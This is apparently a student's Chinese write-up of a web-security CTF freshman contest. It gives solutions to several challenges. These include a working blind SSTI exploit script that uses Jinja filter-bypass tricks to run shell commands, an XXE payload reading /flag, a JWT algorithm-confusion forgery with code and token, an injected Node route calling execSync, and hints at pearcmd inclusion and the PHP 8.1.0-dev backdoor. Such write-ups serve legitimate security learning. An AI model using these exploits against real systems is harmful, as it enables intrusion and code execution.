前言
单挑新生赛以及大创申报双线程作战QwQ
孩子几乎没得睡觉了TwT
不过最后第五名OvO还行啦
想到自己一年前还什么都不会的呢!
CheckIn
数组绕过
Include
php://filter伪协议
Easy Flask
考虑使用{% if(payload) %}1{% endif %}来绕过{{过滤
对于过滤的关键词使用""|attr('__cla''ss__')绕过
利用字符串大于号比较来盲注
详见exp
import requests
url = "http://114.117.187.56:11003/view?name="
flag = ''
for i in range(1,50):
print(i)
for k in range(1,128):
res = requests.get(url+"{%+if(()|attr('__cla''ss__')|attr('__ba''se__')|attr('__subcl''asses__')()|attr('__g''et''it''em__')(175)|attr('__in''it__')|attr('_''_g''l''o''b''a''l''s__')|attr('__g''eti''tem__')('__buil''tins__')|attr('__g''eti''tem__')('ev''al')('__imp''ort__(\"o''s\").popen(\"c''at+/flag\").read()')>'" + flag + chr(k) + "')+%}1{%+endif+%}")
if (res.text == 'NO'):
flag = flag + chr(k-1)
break
print(flag)baby_spring
XXE,用HTML实体编码绕过
payload:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY % a "<!ENTITY exp SYSTEM 'file:///flag' >" > %a;]>
<data>
&exp;
</data>JSJSJS
百度查路由地址,直接访问就行了
baby_ip
抓包改密码和XFF
X-Forwarded-For: 127.0.0.1
password=hggyyds可爱的探针
flag在phpinfo里
真ikun进
flag在js代码里
简单的cms
我们都知道,熊海CMSV1.0有首页文件包含漏洞以及安装了pecl/pear
考虑利用pearcmd来文件包含
unserialize
修改元素个数绕过\_wakeup_
node
公钥泄漏,修改JWT算法为HS256来获取Admin权限
利用URL绕过文件名过滤
const jwt = require('jsonwebtoken');
var fs = require('fs');
var privateKey = fs.readFileSync('private.pem');
var publicKey = fs.readFileSync('public.pem');
var token = jwt.sign({"username": "FlowerYang","isAdmin": true,"home": {"href":"a","origin":"a","protocol":"file:","hostname":"","pathname":"%72outes/api.j%73"},"iat": 1668359673}, publicKey, { algorithm: 'HS256' });
console.log(token)修改api.js来获取flag
修改内容为:
router.post('/something', function(req, res, next) {
var s = require("child_process").execSync("cd ..&&./readflag");
return res.status(200).send(s.toString());
})exp
import requests
headers = {
"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IkZsb3dlcllhbmciLCJpc0FkbWluIjp0cnVlLCJob21lIjp7ImhyZWYiOiJhIiwib3JpZ2luIjoiYSIsInByb3RvY29sIjoiZmlsZToiLCJob3N0bmFtZSI6IiIsInBhdGhuYW1lIjoiJTcyb3V0ZXMvYXBpLmolNzMifSwiaWF0IjoxNjY4MzU5NjczfQ.WyecAqFGsvXMgcdmfV--vg5ZIbfEr0KLIfYnEiiu3uQ"
}
url = "http://114.117.187.56:11010/api/upload"
filename = "file"
content = open("1.txt","rb").read()
file = {filename: content}
res = requests.post(url,headers=headers,files=file)
print(res.text)
import requests
headers = {
"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IkZsb3dlcllhbmciLCJpc0FkbWluIjp0cnVlLCJob21lIjp7ImhyZWYiOiJhIiwib3JpZ2luIjoiYSIsInByb3RvY29sIjoiZmlsZToiLCJob3N0bmFtZSI6IiIsInBhdGhuYW1lIjoiJTcyb3V0ZXMvYXBpLmolNzMifSwiaWF0IjoxNjY4MzU5NjczfQ.WyecAqFGsvXMgcdmfV--vg5ZIbfEr0KLIfYnEiiu3uQ"
}
url = "http://114.117.187.56:11010/api/something"
res = requests.post(url,headers=headers)
print(res.text)可爱的探针2.0
由phpinfo查看php版本,然后利用php-8.1.0-dev后门漏洞RCE
